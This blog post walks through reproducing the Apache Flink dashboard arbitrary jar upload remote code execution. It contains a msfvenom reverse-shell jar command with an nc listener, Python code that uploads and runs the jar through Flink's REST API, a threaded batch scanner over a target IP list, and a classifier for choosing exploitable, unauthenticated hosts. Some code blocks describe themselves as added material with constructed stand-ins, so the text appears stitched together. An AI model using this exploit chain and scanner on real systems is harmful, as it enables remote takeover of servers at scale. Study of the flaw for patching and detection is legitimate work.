Foreword
A record of reproducing the Apache Flink arbitrary jar upload vulnerability that leads to remote code execution.
I have always tried to write reproduction walkthroughs that beginners can follow and learn from; thank you all for the support along the way!
Thanks to Cx01, 首相 and the other 表哥 who helped. Without you there would be no article!
0x01 Vulnerability Description
Recently a security researcher disclosed that the Apache Flink web dashboard accepts arbitrary jar uploads and runs them, which leads to remote code execution.
Affected versions: <= 1.9.1 (the latest release at the time of writing)
My sample was small; the success rate against version 1.9 was relatively high.
0x02 Vulnerability threat level
High
It can lead to remote code execution.
0x03 Reproducing the vulnerability
Step 1: generate the payload with msfvenom (LHOST is the address the shell connects back to, LPORT the port you will listen on):
msfvenom -p java/shell_reverse_tcp LHOST=x.x.x.x LPORT=x -f jar > fuck.jar
The jar name is arbitrary.
Step 2: start a listener on the port given as LPORT; I chose nc:
nc -lvp 8000
Step 3: upload the jar through the dashboard's "Submit new Job" page and submit it; Flink runs the jar's main class inside the JobManager process, so the listener must be reachable from the Flink host.
Step 4: the shell connects straight back to the listener.
Then execute commands.
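Steps 3 and 4 are what the dashboard's "Submit new Job" page does over Flink's REST API: POST /jars/upload with the jar as the multipart field jarfile, then POST /jars/<id>/run, whose handler executes the jar's main class in the JobManager JVM. The Python below is an added example and not the post's own exp code; the endpoint shapes are those the Flink 1.9 REST API documents, the base URL and jar name are placeholders, and OfflineFlink is a constructed stand-in so the block runs without a cluster.

```python
import posixpath


def jar_id_from_filename(filename):
    # Flink answers an upload with the server-side path of the stored copy,
    # e.g. /tmp/flink-web-<uuid>/flink-web-upload/<uuid>_payload.jar; later
    # calls address the jar by that basename only.
    return posixpath.basename(filename)


def upload_jar(base_url, jar_name, jar_bytes, session):
    """POST the jar as multipart data (form field "jarfile"); return its id."""
    files = {"jarfile": (jar_name, jar_bytes, "application/x-java-archive")}
    resp = session.post(f"{base_url}/jars/upload", files=files, timeout=10)
    resp.raise_for_status()
    body = resp.json()
    if body.get("status") != "success" or "filename" not in body:
        raise RuntimeError(f"upload rejected: {body}")
    return jar_id_from_filename(body["filename"])


def run_jar(base_url, jar_id, session, entry_class=None, program_args=None):
    """Ask the JobManager to run the uploaded jar and return the job id.

    The main method executes inside the JobManager JVM, which is why the
    msfvenom jar's reverse shell connects back from the Flink host itself.
    """
    params = {}
    if entry_class:  # only needed when the manifest carries no Main-Class
        params["entry-class"] = entry_class
    if program_args:
        params["program-args"] = program_args
    resp = session.post(f"{base_url}/jars/{jar_id}/run", params=params, timeout=30)
    resp.raise_for_status()
    return resp.json().get("jobid")


def upload_and_run(base_url, jar_name, jar_bytes, session=None):
    """The two REST calls the "Submit new Job" page makes, in sequence."""
    if session is None:
        import requests  # only needed against a live target
        session = requests.Session()
    jar_id = upload_jar(base_url, jar_name, jar_bytes, session)
    return jar_id, run_jar(base_url, jar_id, session)


class _Response:
    def __init__(self, payload, status=200):
        self._payload, self.status_code = payload, status

    def raise_for_status(self):
        if self.status_code >= 400:
            raise RuntimeError(f"HTTP {self.status_code}: {self._payload}")

    def json(self):
        return self._payload


class OfflineFlink:
    """Constructed stand-in for the two Flink 1.9 REST answers used above,
    so the example runs without a cluster. Records every request it gets."""

    def __init__(self):
        self.calls = []

    def post(self, url, **kwargs):
        self.calls.append((url, kwargs))
        if url.endswith("/jars/upload"):
            name = kwargs["files"]["jarfile"][0]
            return _Response({"filename": f"/tmp/flink-web-upload/7f3a1c2e_{name}",
                              "status": "success"})
        if url.endswith("/run"):
            return _Response({"jobid": "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6"})
        return _Response({"errors": ["Not found."]}, status=404)


if __name__ == "__main__":
    # Dry run against the stand-in. For a real target pass session=None, a
    # base_url such as http://target:8081 (placeholder) and the bytes of the
    # jar produced by msfvenom.
    fake = OfflineFlink()
    print(upload_and_run("http://target:8081", "payload.jar", b"PK\x03\x04", fake))
```

The jar id returned by the upload is the only piece of state the second call needs; if the upload response has no "filename" the target is not a stock Flink REST endpoint and the run step is skipped.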
0x04 Pitfalls in reproduction
Be sure to generate the payload with a public IP as LHOST!!! The JobManager has to connect back to your listener, so a private or NAT address will never receive the shell.
If you have no public server, you can use the Sunny-ngrok tool for port forwarding.
Sunny-ngrok official tutorial
0x05 Batch testing script
Script source (reads targets from iplist.txt, one host per line, and prints the hosts whose /jar/upload answers with a JSON body):
```python
"""
auth: @l3_W0ng
version: 1.0
function: Apache Web Dashboard RCE
usage: python3 script.py ip [port [command]]
default port=8081
"""
import requests
from multiprocessing.dummy import Pool as ThreadPool


def get_iplist():
    """Read one target per line from iplist.txt."""
    iplist = []
    with open("iplist.txt", 'r') as file:
        for item in file.readlines():
            ip = item.strip()
            if ip:
                iplist.append(ip)
    return iplist


def check_8081(ip):
    """Probe the dashboard port; a JSON answer is reported, anything else is 'Secure'."""
    url = 'http://' + ip + ':8081/jar/upload'
    try:
        res = requests.get(url=url, timeout=2)
        data = {
            'msg': res.json(),  # raises ValueError when the body is not JSON
            'state': 1,
            'url': url,
            'ip': ip
        }
    except Exception:  # timeout, refused connection or non-JSON body
        data = {
            'msg': 'Secure',
            'state': 0,
            'ip': ip
        }
    if data['state'] == 1:
        print(data)


if __name__ == '__main__':
    iplist = get_iplist()
    pool = ThreadPool(20)
    pool.map(check_8081, iplist)
```
PS:
Once the check `if 'Unable to load requested file' in str(data):` is commented out, responses reporting an empty Token or "Unauthorized request" do not mean unauthenticated access; the instance sits behind authorization.
Partial exploit code
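The distinction the PS makes (a dashboard answering directly versus an authenticating layer in front of it), together with the "<= 1.9.1" cutoff from 0x01, as an added example that is neither the t00ls script nor the post's own exp code. It assumes GET /overview on the dashboard port returns JSON with a flink-version field, as the Flink REST API documents; the 10.0.0.x hosts and their answers are constructed for an offline run, and live_fetch is the drop-in for real targets.

```python
import json

NEWEST_AFFECTED = (1, 9, 1)  # "<= 1.9.1" from the vulnerability description


def parse_version(text):
    """'1.9.1' or '1.9.1-SNAPSHOT' -> (1, 9, 1); None when unparsable."""
    core = text.split("-")[0]
    try:
        return tuple(int(part) for part in core.split("."))
    except ValueError:
        return None


def version_in_scope(text):
    version = parse_version(text)
    return version is not None and version <= NEWEST_AFFECTED


def classify_probe(status, body):
    """Map one answer from GET http://host:8081/overview to (verdict, detail).

    "exposed"       dashboard JSON came back with nothing in front of it
    "auth_required" an authenticating layer answered instead (the empty-token
                    / "Unauthorized request" case the PS describes)
    "not_flink"     anything else
    """
    text = body.decode("utf-8", errors="replace") if isinstance(body, bytes) else body
    low = text.lower()
    if status in (401, 403) or "unauthorized request" in low or "token" in low:
        return "auth_required", f"HTTP {status}: {text.strip()[:60]}"
    try:
        data = json.loads(text)
    except ValueError:
        data = None
    if status == 200 and isinstance(data, dict) and "flink-version" in data:
        return "exposed", data["flink-version"]
    return "not_flink", f"HTTP {status}"


def scan(hosts, fetch, port=8081):
    """fetch(url) -> (status, body). Returns {host: (verdict, detail, in_scope)}."""
    results = {}
    for host in hosts:
        url = f"http://{host}:{port}/overview"
        try:
            status, body = fetch(url)
        except Exception as exc:  # timeouts, refused connections
            results[host] = ("unreachable", str(exc), False)
            continue
        verdict, detail = classify_probe(status, body)
        in_scope = verdict == "exposed" and version_in_scope(detail)
        results[host] = (verdict, detail, in_scope)
    return results


# Constructed sample answers standing in for live hosts (not captured traffic).
SAMPLE_ANSWERS = {
    "http://10.0.0.5:8081/overview": (200, '{"taskmanagers":1,"slots-total":4,"flink-version":"1.9.0"}'),
    "http://10.0.0.6:8081/overview": (200, '{"taskmanagers":2,"slots-total":8,"flink-version":"1.10.0"}'),
    "http://10.0.0.7:8081/overview": (401, "Unauthorized request"),
    "http://10.0.0.8:8081/overview": (200, "<html><title>Welcome to nginx!</title></html>"),
}


def offline_fetch(url):
    if url not in SAMPLE_ANSWERS:
        raise ConnectionError("connection refused")
    return SAMPLE_ANSWERS[url]


def live_fetch(url, timeout=2):
    """Drop-in for offline_fetch against real hosts."""
    import requests
    resp = requests.get(url, timeout=timeout)
    return resp.status_code, resp.text


if __name__ == "__main__":
    targets = ["10.0.0.5", "10.0.0.6", "10.0.0.7", "10.0.0.8", "10.0.0.9"]
    for host, row in scan(targets, offline_fetch).items():
        print(host, *row)
```

Only hosts marked "exposed" with an in-scope version are worth the upload step; "auth_required" hosts are exactly the cases the PS says are not unauthenticated access.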
0x06 References
https://www.t00ls.net/thread-53784-1-1.html
https://mp.weixin.qq.com/s/ArYCF4jjhy6nkY4ypib-Ag
https://flink.apache.org/downloads.html
0x07 Disclaimer
The batch script in 0x05 comes from https://www.t00ls.net/thread-53784-1-1.html; if it infringes any rights, leave a comment and it will be removed. Apologies to the original author!
The PoC and scripts mentioned in this article are for research and study only; please comply with the Cybersecurity Law and other applicable laws and regulations.
Copyright notice: this article is an original work by CSDN blogger 「清水samny」, licensed under CC 4.0 BY-SA; reposts must include the original source link and this notice.
Original link: https://blog.csdn.net/sun1318578251/article/details/103056168